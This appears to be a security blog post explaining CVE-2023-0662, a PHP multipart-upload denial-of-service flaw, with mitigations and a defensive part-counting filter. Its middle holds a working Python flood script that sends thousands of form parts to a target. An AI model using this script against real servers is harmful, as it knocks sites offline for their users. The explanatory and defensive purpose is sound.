CVE-2023-0662 is a vulnerability discovered in PHP versions 8.0.x before 8.0.28, 8.1.x before 8.1.16, and 8.2.x before 8.2.3. It allows an attacker to crash or slow down a web server by simply sending a huge number of parts in an HTTP form upload. This leads to high CPU usage and tons of log files, eventually denying service to normal users: a classic Denial of Service (DoS) scenario.
This post will explain the vulnerability in plain language, show you how the problem works (with demo code!), and provide official references for further reading.
Why Is This a Problem?
In PHP, handling multipart/form-data (used for form file uploads) is common. But PHP’s parser had no reasonable limit for the number of form "parts." If someone uploads a form with thousands or even millions of fields or files, PHP works overtime parsing them:
- Server slows or crashes, denying access to real users.
- This attack requires no authentication. Anyone who can post data to your site can try it.
Quick Example: Exploiting CVE-2023-0662
Let's look at how an attacker might make use of this bug with a simple Python script. This script *spams* your PHP server with a giant HTTP POST request full of form parts.
> ⚠️ Only run the following code in your own safe test environment! Don't attack real servers.
Python Exploit Script
import requests

TARGET_URL = 'http://localhost/upload.php'

# Create a super-large multipart/form-data body
boundary = '----WebKitFormBoundaryxYz'  # Just something unique
parts = []

# Prepare 10,000 fake file fields (you can increase this number for a stronger attack)
for i in range(10000):
    part = (
        f'--{boundary}\r\n'
        f'Content-Disposition: form-data; name="file{i}"; filename="file{i}.txt"\r\n'
        f'Content-Type: text/plain\r\n\r\n'
        f'dummy content {i}\r\n'
    )
    parts.append(part)

# Closing delimiter ends the multipart body
parts.append(f'--{boundary}--\r\n')
body = ''.join(parts)

headers = {
    'Content-Type': f'multipart/form-data; boundary={boundary}'
}

response = requests.post(TARGET_URL, data=body, headers=headers)
print("Response code:", response.status_code)
After running this, check your server's CPU, memory, and logs—you’ll likely see a big spike.
Suppose this is your simple upload handler on the server:
<?php
// upload.php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    foreach ($_FILES as $file) {
        // Just list file names (no real processing)
        echo 'Received: ' . htmlspecialchars($file['name']) . "\n";
    }
}
?>
If you attack this script with the previous Python code, PHP's multipart parser gets overloaded—processing thousands of files even if you don't do anything with them.
How Serious Is This?
- Anyone can trigger this DoS, since it just needs access to your upload endpoint (no login required).
- All PHP servers running affected versions (8.0.x < 8.0.28, 8.1.x < 8.1.16, 8.2.x < 8.2.3) are vulnerable if they accept file uploads.
This can be used to bring down websites, exhaust logging disk space, or disrupt services until the server is rebooted or the logs are cleared.
How Did PHP Fix It?
PHP now limits the number of multipart form parts it will process. If excessive parts come in, PHP stops parsing and throws an error.
Official References
- PHP Changelog for 8.0.28
- NVD Entry for CVE-2023-0662
- GitHub PHP Patch Diff
1. Upgrade PHP to the latest safe release for your branch.
2. Set reasonable request limits (e.g., PHP's post_max_size and upload_max_filesize, and possibly a custom reverse proxy rule to cap requests).
3. Use a Web Application Firewall (WAF) that blocks requests with an excessive number of form parts or files.
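A minimal version of the third item, as an added example (not code from the post or from PHP itself): a pre-filter that counts multipart parts and rejects the request before PHP ever parses it. MAX_PARTS, the function names and the constructed sample bodies are assumptions; the body layout mirrors the script above.

```python
import re
from typing import Optional

# Assumed cap on parts per request; tune to what your forms legitimately need.
MAX_PARTS = 200


def boundary_from_content_type(content_type: str) -> Optional[str]:
    """Return the boundary parameter of a multipart/form-data Content-Type, else None."""
    if not content_type.lower().startswith("multipart/form-data"):
        return None
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    return m.group(1) if m else None


def count_parts(body: bytes, boundary: str, limit: int = MAX_PARTS) -> int:
    """Count part delimiters ("--boundary" CRLF at body start or after a CRLF).

    The closing "--boundary--" is not counted. Scanning stops as soon as the
    limit is exceeded, so the check itself stays cheap on a huge body.
    """
    delim = re.compile(rb"(?:^|\r\n)--" + re.escape(boundary.encode()) + rb"\r\n")
    n = 0
    for _ in delim.finditer(body):
        n += 1
        if n > limit:
            break
    return n


def should_reject(content_type: str, body: bytes, limit: int = MAX_PARTS) -> bool:
    """True if the request is multipart and carries more than `limit` parts."""
    boundary = boundary_from_content_type(content_type)
    if boundary is None:
        return False  # not multipart; nothing for this filter to decide
    return count_parts(body, boundary, limit) > limit


def build_body(boundary: str, n: int) -> bytes:
    """Constructed sample body with n text-file parts, same layout as the post's script."""
    parts = [
        f'--{boundary}\r\nContent-Disposition: form-data; name="file{i}"; '
        f'filename="file{i}.txt"\r\nContent-Type: text/plain\r\n\r\ndummy content {i}\r\n'
        for i in range(n)
    ]
    parts.append(f"--{boundary}--\r\n")
    return "".join(parts).encode()


if __name__ == "__main__":
    ct = "multipart/form-data; boundary=----WebKitFormBoundaryxYz"
    print(should_reject(ct, build_body("----WebKitFormBoundaryxYz", 3)))      # False
    print(should_reject(ct, build_body("----WebKitFormBoundaryxYz", 10000)))  # True
```

Patched PHP enforces a cap of its own through the max_multipart_body_parts INI directive; a filter like this one simply stops an oversized body earlier, at the proxy or WAF layer.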
Summary
CVE-2023-0662 is a real-world DoS risk for PHP sites. If you run a PHP upload endpoint and haven't updated in a while, an attacker could flood you with huge forms, eat your CPU, fill your disks, and take you offline. Fixing it is as simple as updating PHP and setting smart upload limits.
Further reading
- How to Secure PHP File Uploads (PHP Manual)
- OWASP: File Upload Vulnerabilities
*Post written exclusively for this request by an AI trained on security best practices (last update June 2024).*
Timeline
Published on: 02/16/2023 07:15:00 UTC
Last modified on: 02/24/2023 18:09:00 UTC